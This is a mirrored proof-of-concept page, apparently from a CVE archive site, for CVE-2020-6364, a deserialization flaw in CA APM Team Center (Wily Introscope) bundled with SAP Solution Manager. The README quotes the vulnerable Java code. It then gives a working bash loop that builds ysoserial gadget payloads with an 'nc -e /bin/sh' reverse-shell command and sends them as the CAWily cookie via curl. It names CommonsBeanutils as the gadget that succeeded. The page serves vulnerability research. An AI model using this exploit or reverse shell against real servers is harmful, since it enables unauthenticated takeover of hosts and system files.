Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-6364 PoC — SAP Solution Manager和SAP Focused Run 操作系统命令注入漏洞

Source
https://github.com/gquere/CVE-2020-6364
Associated Vulnerability
Title:SAP Solution Manager和SAP Focused Run 操作系统命令注入漏洞 (CVE-2020-6364)
Description:SAP Solution Manager and SAP Focused Run (update provided in WILY_INTRO_ENTERPRISE 9.7, 10.1, 10.5, 10.7), allows an attacker to modify a cookie in a way that OS commands can be executed and potentially gain control over the host running the CA Introscope Enterprise Manager,leading to Code Injection. With this, the attacker is able to read and modify all system files and also impact system availability.
Description
Remote code execution in CA APM Team Center (Wily Introscope)
Readme
# CVE-2020-6364
Remote code execution in CA APM Team Center (Wily Introscope).

[Original advisory](https://github.com/Onapsis/vulnerability_advisories/blob/main/2021/CVE-2020-6364/ONAPSIS-2021-0008-OS_Command_Injection_in_CA_Introscope_Enterprise_Manager.md)

A deserialization vulnerability in CA APM Team Center leads to unauthenticated remote code execution on the server.

When authenticating to the server a cookie is returned that starts with the infamous ```rO0``` string indicating a base64-encoded serialized object:
![](./cookie.png)

Although I haven't fully traced the problem statically, this probably is the vulnerable code:
```java
public class HttpRequestHeaderInfo implements Externalizable {
  public void readExternal(ObjectInput in) throws IOException, ClassNotFoundException {

    in.readInt();
    int numMapEntries = in.readInt();
    this.fRequestParameterMap = (numMapEntries == 0) ? Collections.EMPTY_MAP : new HashMap(numMapEntries);

    for (int i = 0; i < numMapEntries; i++) {
      this.fRequestParameterMap.put(in.readUTF(), in.readObject());
    }

    int numCookies = in.readInt();
    this.fCookies = (numCookies == 0) ? kNoCookies : new Cookie[numCookies];

    for (int j = 0; j < this.fCookies.length; j++) {
      this.fCookies[j] = new Cookie((String)in.readObject(), (String)in.readObject());
    }
  }
}
```

Notice that the parameter map and the cookie are deserialized using ```readObject()``` from the user input.

This is trivially exploited by identifying a suitable gadget in a for loop:
```bash
for gadget in AspectJWeaver BeanShell1 C3P0 Click1 Clojure CommonsBeanutils1 CommonsCollections1 CommonsCollections2 CommonsCollections3 CommonsCollections4 CommonsCollections5 CommonsCollections6 CommonsCollections7 FileUpload1 Groovy1 Hibernate1 Hibernate2 JBossInterceptors1 JRMPClient JRMPListener JSON1 JavassistWeld1 Jdk7u21 Jython1 MozillaRhino1 MozillaRhino2 Myfaces1 Myfaces2 ROME Spring1 Spring2 URLDNS Vaadin1 Wicket1
do
    java -jar ./ysoserial-0.0.6-SNAPSHOT-all.jar $gadget "nc -e /bin/sh ..." | base64 -w0 > cookie
    payload=$(cat cookie)
    curl -s -k 'https://remoteserver/' -X POST -H "Cookie: CAWily=$payload"
done
```

The only payload that produced remote code execution for me was CommonsBeanutils. The embedded JAR is ```org.apache.commons_beanutils_1.9.2.1.jar``` and does indeed include a vulnerable gadget according to the [maven repository](https://mvnrepository.com/artifact/commons-beanutils/commons-beanutils/1.9.2).

Thanks
======
Obligatory thanks to a special someone who had me double check the header.
File Snapshot

 [4.0K]  /data/pocs/6c65f475d3d8c618228dee556b0aea6e840ac88e
├── [198K]  cookie.png
└── [2.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →